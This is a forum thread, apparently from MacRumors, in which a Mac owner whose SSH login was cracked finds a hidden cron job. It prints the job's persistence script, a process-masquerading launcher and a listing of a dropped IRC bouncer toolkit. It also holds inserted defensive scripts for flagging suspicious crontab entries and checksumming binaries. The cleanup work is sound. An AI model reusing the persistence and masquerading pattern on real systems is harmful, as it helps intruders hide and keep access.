Unknown network traffic reported by little snitch

Discussion in 'macOS' started by Pimptastic, Feb 27, 2009.

  1. Pimptastic macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #1
    Just got home from work and Little Snitch is reporting that the following processes...

    sshd
    launchproxy
    Mac OS X kernel

    ...are pretty much constantly connecting to 78.107.128.250

    Looked a bit suspicious, so I told Little Snitch to block all applications from accessing that IP address, but it doesn't seem to have done anything. Little Snitch is still reporting that those processes are accessing that IP.

    If you type the IP address into firefox, it brings up a (Russian?) website.

    If I turn off Remote Sharing in System Preferences, the connections disappear.

    I have tried changing my user password, but the connections still persist.

    Anyone have any ideas what that IP address relates to? And if so, how to stop it?

    Thanks
     
  2. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #2
    A few things...

    Open up Activity Monitor, and use the little pop-up menu to display All Processes, Hierarchically.

    Take a screen shot of all the entries listed there and post it here.

    Also, in a Terminal window, type the following command:

    sudo ps -ax

    And paste the output here.
     
  3. lostngone macrumors demi-god

    lostngone

    Joined:
    Aug 11, 2003
    Location:
    Anchorage
    #3
    Does your /var/log/system.log show anything and what shows up when you type the "last" or "w" command?

    Those can be easily tampered with if the system was compromised but it doesn't hurt to look...
     
  4. crazzyeddie macrumors 68030

    crazzyeddie

    Joined:
    Dec 7, 2002
    Location:
    Florida, USA
    #4
    Any chance you downloaded iWork '09 illegally when it came out?
     
  5. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #5
    Hi mate, here is the info you requested. I have turned remote login off for the time being. Pictures of Activity Monitor are attached.

    Code:
      1 ??         0:05.27 /sbin/launchd
       10 ??         0:00.77 /usr/libexec/kextd
       11 ??         0:26.00 /usr/sbin/DirectoryService
       12 ??         0:04.64 /usr/sbin/notifyd
       13 ??         0:10.80 /usr/sbin/syslogd
       14 ??         0:25.29 /usr/sbin/configd
       15 ??         0:02.21 /usr/sbin/distnoted
       16 ??         0:03.65 /usr/sbin/mDNSResponder -launchd
       22 ??         0:06.11 /usr/sbin/securityd -i
       26 ??         0:06.40 /usr/sbin/ntpd -c /private/etc/ntp-restrict.conf -n -g
       27 ??         0:01.79 /usr/sbin/cupsd -l
       28 ??         0:00.79 /usr/sbin/cron
       29 ??         0:56.77 /usr/sbin/update
       30 ??         0:00.01 /sbin/SystemStarter
       34 ??         0:00.03 /System/Library/CoreServices/RemoteManagement/AppleVNC
       35 ??         3:32.09 /System/Library/Frameworks/CoreServices.framework/Fram
       36 ??         0:00.84 /System/Library/CoreServices/loginwindow.app/Contents/
       37 ??         0:00.01 /usr/sbin/KernelEventAgent
       38 ??         0:04.89 /usr/sbin/kdcmond -n -a
       40 ??         0:00.01 /usr/libexec/hidd
       41 ??         1:00.58 /System/Library/Frameworks/CoreServices.framework/Vers
       43 ??         0:00.01 /sbin/dynamic_pager -F /private/var/vm/swapfile
       46 ??         0:01.25 /usr/sbin/diskarbitrationd
       50 ??         0:00.22 /usr/sbin/blued
       51 ??         0:00.01 autofsd
       53 ??         0:01.81 /usr/libexec/ApplicationFirewall/socketfilterfw
       54 ??         0:00.20 /usr/local/sbin/dnsupdate daemon
       56 ??         0:00.02 /bin/sh /Library/Parallels/Parallels Service.app/Conte
       57 ??         0:01.39 /Library/Little Snitch/lsd
       73 ??         0:03.81 /System/Library/CoreServices/coreservicesd
       90 ??         0:00.04 /usr/sbin/krb5kdc -n -r LKDC:SHA1.38741A8FE8A8BB2B2C47
       91 ??        16:48.92 /System/Library/Frameworks/ApplicationServices.framewo
       97 ??         0:01.22 /usr/local/sbin/dyndnsd daemon
      106 ??         0:00.38 /usr/sbin/racoon -e -x
      109 ??         0:00.15 /Library/Application Support/VMware Fusion/vmnet-natd 
      142 ??         0:00.15 /Library/Application Support/VMware Fusion/vmnet-dhcpd
      146 ??         0:00.00 /Library/Application Support/VMware Fusion/vmnet-netif
      151 ??         0:00.00 /Library/Application Support/VMware Fusion/vmnet-netif
      156 ??         0:00.18 /Library/Application Support/VMware Fusion/vmnet-dhcpd
      157 ??         0:00.99 /sbin/launchd
      161 ??         0:00.00 /Library/Application Support/VMware Fusion/vmnet-bridg
      170 ??         0:06.77 /Library/Parallels/Parallels Service.app/Contents/MacO
      182 ??         0:59.42 /Library/Parallels/Parallels Service.app/Contents/MacO
      185 ??         0:00.44 /usr/sbin/coreaudiod
      203 ??         0:00.17 /Users/Mark/Library/Application Support/Plex/PlexHelpe
      204 ??         8:18.75 /Library/Little Snitch/Little Snitch Network Monitor.a
      205 ??         0:00.54 /Library/Little Snitch/Little Snitch UIAgent.app/Conte
      207 ??         0:00.13 /System/Library/CoreServices/AirPort Base Station Agen
      210 ??         0:00.14 /System/Library/CoreServices/RemoteManagement/ARDAgent
      212 ??         0:00.25 /System/Library/CoreServices/Spotlight.app/Contents/Ma
      213 ??         0:00.28 /usr/sbin/UserEventAgent -l Aqua
      214 ??         0:00.21 aped
      215 ??         0:00.00 /usr/sbin/pboard
      216 ??         0:00.09 /System/Library/CoreServices/RemoteManagement/AppleVNC
      217 ??         0:00.00 /System/Library/CoreServices/RemoteManagement/AppleVNC
      218 ??         0:08.12 /System/Library/Frameworks/ApplicationServices.framewo
      219 ??        11:53.15 /System/Library/CoreServices/Dock.app/Contents/MacOS/D
      220 ??        12:39.59 /System/Library/CoreServices/SystemUIServer.app/Conten
      221 ??         0:54.93 /System/Library/CoreServices/Finder.app/Contents/MacOS
      225 ??         0:06.20 /System/Library/CoreServices/Dock.app/Contents/Resourc
      238 ??         0:02.16 /usr/sbin/nmbd -F
      317 ??         0:00.01 /System/Library/Services/AppleSpell.service/Contents/M
    15387 ??         4:20.78 /Applications/Firefox.app/Contents/MacOS/firefox-bin -
    15523 ??         0:09.91 /System/Library/PrivateFrameworks/DiskImages.framework
    15524 ??         0:04.51 /System/Library/PrivateFrameworks/DiskImages.framework
    15528 ??         0:00.45 /System/Library/PrivateFrameworks/DiskImages.framework
    15542 ??         0:00.00 /System/Library/Frameworks/JavaVM.framework/Versions/A
    15605 ??         7:20.54 /Applications/ClamXav.app/Contents/MacOS/ClamXav -psn_
    15710 ??       105:16.68 /usr/local/clamXav/bin/clamscan --stdout -v -r -i --no
    17340 ??         0:00.37 /System/Library/Frameworks/CoreServices.framework/Fram
    18130 ??         0:00.25 /System/Library/Image Capture/Devices/PTPCamera.app/Co
    18134 ??         0:00.82 /System/Library/Image Capture/Support/Image Capture Ex
    18141 ??         0:00.89 /System/Library/Frameworks/CoreServices.framework/Fram
    18236 ??         0:05.01 /Applications/Mail.app/Contents/MacOS/Mail -psn_0_1061
    18243 ??         0:00.30 /System/Library/Frameworks/SyncServices.framework/Vers
    18245 ??         0:00.08 /usr/sbin/smbd -F
    18246 ??         0:00.00 /usr/sbin/smbd -F
    18259 ??         0:05.83 /Applications/Utilities/Activity Monitor.app/Contents/
    18260 ??         0:03.31 /Applications/Utilities/Activity Monitor.app/Contents/
    18283 ??         0:00.42 /System/Library/PrivateFrameworks/DiskImages.framework
    18310 ??         0:00.82 /Applications/Utilities/Terminal.app/Contents/MacOS/Te
    18339 ttys000    0:00.02 login -pf Mark
    18340 ttys000    0:00.01 -bash
    18351 ttys000    0:00.04 ps -ax
    
    I did cos I couldn't wait for my copy to arrive, but it didn't have the virus; I checked before installing and after installing.
     

  6. angelwatt Moderator emeritus

    angelwatt

    Joined:
    Aug 16, 2005
    Location:
    USA
  7. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #7
    You should probably check your crontabs.

    In the terminal:

    sudo cat /etc/crontab

    and for your user crontab:

    crontab -l

    Might as well check root's crontab:

    sudo crontab -l
     
  8. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #8
    Only thing that came up was with the last command

    Code:
    * * * * * /var/root/.access.log/y2kupdate >/dev/null 2>&1
    Did you see anything suspicious in my previous post?
     
  9. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #9
    That entry should definitely NOT be there.

    First, change the permissions on that file so that it is no longer executable (You'll be working in the Terminal):

    sudo chmod a-x /var/root/.access.log/y2kupdate

    Next, you can either delete it, or move it to your home directory where you may examine it to see what it's doing.

    To move:

    sudo mv /var/root/.access.log/y2kupdate /Users/Mark/malware

    View its contents:

    sudo cat /Users/Mark/malware

    To delete it right where it is:

    sudo rm /var/root/.access.log/y2kupdate

    And clean up your root's crontab file:

    sudo crontab -r

    When you have moved/deleted that file, you should verify that some other process is not attempting to recreate it. Wait a little while, and then run:

    ls /var/root/.access.log/
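A small check, added here and not part of the thread, that does the crontab review from the posts above mechanically: it reads crontab text on stdin and flags entries with the traits of the y2kupdate line (command in a hidden dot-directory, every-minute schedule, all output silenced). The sample crontab is constructed; on a live machine feed it the output of `sudo crontab -l`, `crontab -l` and `cat /etc/crontab`.

```bash
#!/bin/sh
# Constructed sample root crontab: the entry found in the thread plus two benign ones.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/sbin/periodic daily
* * * * * /var/root/.access.log/y2kupdate >/dev/null 2>&1
30 2 * * 0 /usr/local/bin/backup.sh >> /var/log/backup.log'

# Read crontab text on stdin and print each entry that trips a red flag, as
# "<reasons><TAB><entry>". Comments and blank lines are skipped.
flag_cron_entries() {
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*) continue ;;
        esac
        reasons=''
        # Command lives in a dot-directory, a classic place to hide a dropped toolkit.
        case "$line" in
            */.[!/]*) reasons="${reasons}hidden-dir " ;;
        esac
        # Five bare asterisks (space separated): runs every minute, typical of a
        # "keep the bot alive" job like the y2kupdate one.
        case "$line" in
            '* * * * * '*) reasons="${reasons}every-minute " ;;
        esac
        # Everything the command prints is discarded, so nothing lands in a log.
        case "$line" in
            *'>/dev/null 2>&1'*|*'&>/dev/null'*) reasons="${reasons}silenced " ;;
        esac
        if [ -n "$reasons" ]; then
            printf '%s\t%s\n' "${reasons% }" "$line"
        fi
    done
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_entries
```

A hit is a prompt to inspect the referenced file (owner, timestamps, contents), not proof on its own; a legitimate every-minute job with silenced output does exist on some systems.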
     
  10. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #10
    Thanks for that, appreciate it.

    This is the content of that file. Any idea what it was?

    Code:
    iMac:~ Mark$ sudo cat /Users/Mark/malware
    #!/bin/sh
    if test -r /var/root/.access.log/psybnc.pid; then
    pid=$(cat /var/root/.access.log/psybnc.pid)
    if $(kill -CHLD $pid >/dev/null 2>&1)
    then
    exit 0
    fi
    fi
    cd /var/root/.access.log
    ./run &>/dev/null
    
     
  11. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #11
    You've got some more cleaning to do.

    In the terminal:

    cat /var/root/.access.log/psybnc.pid

    If you get output, it should be a number. You are going to feed this number to a command to examine the process it's attached to:

    sudo ps -ax -p [number] -- replace [number] with the above output. Omit the braces.

    Also, check the contents of the following:

    sudo cat /var/root/.access.log/run
     
  12. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #12
    Did the first command but got permission denied.

    Code:
    iMac:~ Mark$ cat /var/root/.access.log/psybnc.pid
    cat: /var/root/.access.log/psybnc.pid: Permission denied
    
     
  13. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #13
    Another followup:

    If it's available, you should examine the contents of your bash history:

    less ~/.bash_history (use the space bar to scroll output one page at a time)
     
  14. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #14
    You'll need to prepend the cat command with sudo to gain elevated privileges.

    sudo cat /var/root/.access.log/psybnc.pid
     
  15. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #15
    Just done that, nothing suspicious in there

    Code:
    iMac:~ Mark$ sudo cat /var/root/.access.log/psybnc.pid
    Password:
    cat: /var/root/.access.log/psybnc.pid: No such file or directory
    
     
  16. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #16
    Is there anything else in that /var/root/.access.log/ directory? You can see with an ls command.

    sudo ls -al /var/root/.access.log/
     
  17. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #17
    Definitely some suspicious stuff in there.

    There is something in there called f u c k (without spaces)... as you can see, the swear filter caught it below.

    Code:
    iMac:~ Mark$ sudo ls -al /var/root/.access.log/
    total 608
    drwxr-xr-x   19 504   504       646 27 Feb 21:33 .
    drwxr-x---+  16 root  wheel     544  7 Jan 18:12 ..
    -rw-r--r--    1 504   504     33557 10 Mar  2004 README
    -rwxr-xr-x    1 504   504       320 31 May  2004 config
    -rw-------    1 504   504      1002 10 Mar  2004 config.h
    -rw-r--r--    1 root  504        58  3 Jan 11:35 cron.d
    -rwxr-xr-x    1 504   504       347 31 May  2004 ****
    drwxr-xr-x  245 504   504      8330 31 May  2002 help
    -rwxr-xr-x    1 504   504    202544 10 Mar  2004 httpd
    drwxr-xr-x    6 504   504       204 26 Jul  2004 lang
    -rw-r--r--    1 root  504       139 26 Dec 12:41 livezone
    -rw-r--r--    1 root  504        22  3 Jan 11:35 livezone.dir
    drwxr-xr-x    3 504   504       102  6 May  2004 log
    drwxr-xr-x    2 504   504        68  4 Jun  2004 motd
    -rwxr-xr-x    1 504   504     14306 13 Nov  2003 proc
    drwxr-xr-x   34 1001  admin    1156  3 Jan 11:34 pulamea
    -rwxr-xr-x    1 504   504        68  4 Jun  2004 run
    drwxr-xr-x    3 504   504       102 10 Mar  2004 scripts
    -rwxr--r--    1 504   504     21516 25 Sep  2002 xh
    
     
  18. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #18
    First, remove execution permissions from everything in that folder:

    sudo chmod -R a-x /var/root/.access.log/*

    Next, dump the contents of that "run" file:

    sudo cat /var/root/.access.log/run

    This is starting to look like you got "pwned", and someone may have dropped a rootkit into your system. If you had a weak password (a word in the dictionary, for example), someone could have easily cracked it when you had Remote Access enabled. From there, it would have been trivial to log into your system and download a *nix rootkit to set up your machine to act as a zombie on a bot net.
     
  19. Pimptastic thread starter macrumors regular

    Pimptastic

    Joined:
    Nov 27, 2006
    Location:
    Up North, UK
    #19
    Running the first command returns this message

    Code:
    iMac:~ Mark$ sudo chmod -R a-x /var/root/.access.log/*
    chmod: /var/root/.access.log/*: No such file or directory
    
    The content of that run file is

    Code:
    #!/bin/sh
    ./proc "/usr/local/apache/bin/httpd -DSSL" httpd livezone
    Yeah, looks like I've been hacked. My password is two words joined together with a number on the end.
     
  20. ElectricSheep macrumors 6502

    ElectricSheep

    Joined:
    Feb 18, 2004
    Location:
    Wilmington, DE
    #20
    My guess is that the httpd there is just a front end to spawn other processes that are tripping Little Snitch.

    If you can, package up this .access.log directory and send it to me. I'd like to do some digging through them so I can get a better idea what is going down on your machine.

    First, move that sucker to your home directory:

    sudo mv /var/root/.access.log /Users/Mark/bad_directory

    Next, change ownership on it so you can manipulate it:

    sudo chown -R Mark /Users/Mark/bad_directory

    Then, use the Finder to compress it and send me the resulting zip file. Either PM it to me as an attachment, or if you would like to email it to me I will PM you my email address.

    I also have AIM/iChat if that is more convenient for you.
     
  21. jw2002 macrumors 6502

    Joined:
    Feb 23, 2008
    #21
    This thread got me to wondering about my sister's mac. After doing a little digging, I discovered that a script kiddie got in and installed an energymech IRC robot 4 days ago. The machine had weak security: password same as username plus incoming ssh open. After cleaning up that mess, my sister is now using far stronger passwords and has unchecked all the sharing settings.
     
  22. crazzyeddie macrumors 68030

    crazzyeddie

    Joined:
    Dec 7, 2002
    Location:
    Florida, USA
    #22
    Where are most of these processes installed? Startup items?
     
  23. lostngone macrumors demi-god

    lostngone

    Joined:
    Aug 11, 2003
    Location:
    Anchorage
    #23
    Did you format and re-install?
    If you didn't the chances are good that they still own your sister's computer.
    Without running a checksum on every system file you will not know what files have been replaced. With a good rootkit they can hide almost anything.
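Added example (not from the thread) of the checksum idea in the post above: record a hash baseline of a directory of binaries while the system is known-good, then compare later to surface replaced, removed or newly dropped files. It uses sha256sum or shasum, whichever the host has; the sample tree and paths are constructed.

```bash
#!/bin/sh
# Print "<sha256>  <path>" for one file, using whichever tool the host has
# (sha256sum on Linux, shasum -a 256 on macOS; both share this output format).
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1"
    else
        shasum -a 256 "$1"
    fi
}

# Baseline: one "<hash> <path>" line per regular file under the directory $1.
# Take it while the system is known-good and keep the output off the machine.
make_baseline() {
    find "$1" -type f | LC_ALL=C sort | while IFS= read -r f; do
        printf '%s %s\n' "$(hash_file "$f" | cut -d' ' -f1)" "$f"
    done
}

# Verify: $1 = saved baseline file, $2 = directory to re-check.
# Prints MODIFIED / MISSING / NEW lines; returns 1 if anything differs, 0 if clean.
verify_baseline() {
    baseline=$1; dir=$2; changed=0
    # Files recorded in the baseline: still there, and still the same bytes?
    while read -r want path; do
        if [ ! -f "$path" ]; then
            printf 'MISSING  %s\n' "$path"; changed=1; continue
        fi
        have=$(hash_file "$path" | cut -d' ' -f1)
        if [ "$have" != "$want" ]; then
            printf 'MODIFIED %s\n' "$path"; changed=1
        fi
    done < "$baseline"
    # Files present now that the baseline never saw (e.g. a freshly dropped tool).
    newfiles=$(find "$dir" -type f | while IFS= read -r f; do
        cut -d' ' -f2- "$baseline" | grep -qxF "$f" || printf 'NEW      %s\n' "$f"
    done)
    if [ -n "$newfiles" ]; then
        printf '%s\n' "$newfiles"; changed=1
    fi
    return $changed
}
```

The caveat from the same post still applies: run the check from clean media, because a rootkit that replaced `find` or the hashing tool can lie to it.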
     
  24. dmmcintyre3 macrumors 68020

    Joined:
    Mar 4, 2007
    #24
    I have a hardware firewall with no ports open and a completely random 128 bit length encryption code like password that nobody could remember by watching me type it.
     
  25. lostngone macrumors demi-god

    lostngone

    Joined:
    Aug 11, 2003
    Location:
    Anchorage
    #25
    They installed software on that computer! How hard would it have been to install a key logger along with the bot (hint... not hard)? You say you have no ports open; I will assume you mean no in-bound ports open. What happens if your box is the one opening the ports and sending out the data? Programs like Little Snitch do little if they have/had admin access into the system.

    You can not trust anything on that system. If they had root/admin access they can make it appear you have a clean system, all they do is replace programs like ls, ps, top, df, who, last, passwd, etc and replace them with their own that ignore the files and processes they are running, add a system log cleaner to cover their tracks and no one is the wiser...
     